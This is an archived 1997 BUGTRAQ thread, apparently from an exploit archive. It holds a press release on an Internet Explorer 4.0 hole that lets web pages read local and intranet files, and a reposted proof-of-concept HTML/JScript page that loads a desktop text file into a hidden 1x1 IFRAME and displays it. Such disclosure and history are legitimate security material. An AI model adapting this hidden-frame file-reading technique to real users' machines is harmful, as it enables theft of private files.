Date: Fri, 17 Oct 1997 11:35:37 -0500 From: Aleph One <aleph1@DFW.NET> To: BUGTRAQ@NETSPACE.ORG Subject: Security Hole in Explorer 4.0 http://www.jabadoo.de/press/ie4_us.html Security Hole in Explorer 4.0 Freiburg - 10/16/97 - A dangerous security hole in Internet Explorer 4.0 was detected by Ralf Hueskes of Jabadoo Communications when he conducted a series of security tests for [3]c't computer magazine. His tests revealed that it is possible to spy on the contents of any text and HTML files on somebody else's computer. Not only local files are in danger, but also data on your company's intranet - even if it is protected by a firewall. The security hole exists even if users have activated the highest security level in their browser. The problem affects both the German and the English version of the Internet Explorer. The code needed for infiltrating your files can be hidden in any normal Web page or in an e-mail message. Technical Details The spy pages make use of JScript. If a user accesses a page or receives an e-mail containing this code, infiltration begins ... The spy page contains a so-called IFRAME sized 1 by 1 pixel. When a user accesses the page or opens the e-mail message, a small Jscript program loads the HTML or text file to be spied on into this frame. The contents of the frame can then be read using Dynamic HTML and sent as a parameter hidden in a URL to any Web server in the Internet. [4]demo page Protective Measures According to Ralf Hueskes of Jabadoo Communications, the security hole exploits an error in the Internet Explorer 4.0 that can be fixed only by the manufacturer. Microsoft is aware of the problem and will make available a patch for download from [5]http://www.microsoft.com/ie/ on October 17th 1997. Experienced users can protect themselves by completely deactivating the execution of Active Scripting in the security settings (menu item: Tools/Options/Security, Settings/Custom (for expert users)/Active Scripting/Disable) and by using the Security Zones feature in Internet Explorer 4.0. More Information For more information (press only), please contact Ralf Hueskes of Jabadoo Communications f31 (ralf.hueskes@jabadoo.de). Additional information can also be found in c't magazine, vol. 12/97 (to be published on 10/27/97). Miscellaneous Trademarks, program names, company names etc. mentioned on this Web page may be protected by trademark law and international agreements. Although all information has been verified, we cannot guarantee its correctness. _________________________________________________________________ References 1. http://www.jabadoo.de/index.html 2. http://www.jabadoo.de/index.html 3. http://www.heise.de/ct/ 4. http://www.jabadoo.de/press/ie4demo.html 5. http://www.microsoft.com/ie/ Date: Fri, 17 Oct 1997 18:05:56 -0500 From: Aleph One <aleph1@DFW.NET> To: BUGTRAQ@NETSPACE.ORG Subject: Jabadoo Security Hack Well it seems Microsoft convinced the guys at Jabadoo to take down the demostration page. For those that didnt get to see it here it (silly for them to think that taking it down after it was up would make a differnce). Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ---------- cut here ---------- <HTML> <HEAD> <TITLE>IE4 Jabadoo Hack</TITLE> <SCRIPT LANGUAGE="JavaScript"> function init() { document.all("MyFrame1").src = 'file://c:/Windows/desktop/t1.txt'; setTimeout ('getLinks()', 5000); } function getLinks() { alert(document.all("MyFrame1").document.body.outerHTML); } </SCRIPT> </HEAD> <BODY onLoad="init()"> <A HREF="http://www.jabadoo.de/"><IMG SRC="/images/logo-small.gif" BORDER=0></A> <FONT SIZE=2 FACE=Arial><P>This sample page shows the first part of the <B>jabadoo hack</B>: </P> <P>With a delay of 5 seconds, the content of the file C:\WINDOWS\DESKTOP\T1.TXT is loaded by this sample page and displayed in a message box. </P> <P>In a second step, this content could be hidden in an url and transfered to every server on the net ...</P> <P>If you get an error message, the timeout of 5 seconds is propably too short or the file C:\WINDOWS\DESKTOP\T1.TXT does not exist on your computer ...</P> <P><B><A HREF="ie4_us.html">English Press Release</A></B></P> <P><B><A HREF="ie4.html">German Press Release</A></B></P> <IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1" SRC="blank.html" > </FONT> </BODY> </HTML> More Exploits! The master index of all exploits is available here (Very large file) Or you can pick your favorite operating system: All OS's Linux Solaris/SunOS Micro$oft *BSD Macintosh AIX IRIX ULTRIX/Digital UNIXHP/UX SCO Remote exploits This page is part of Fyodor's exploit world. Please do not steal it. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. 0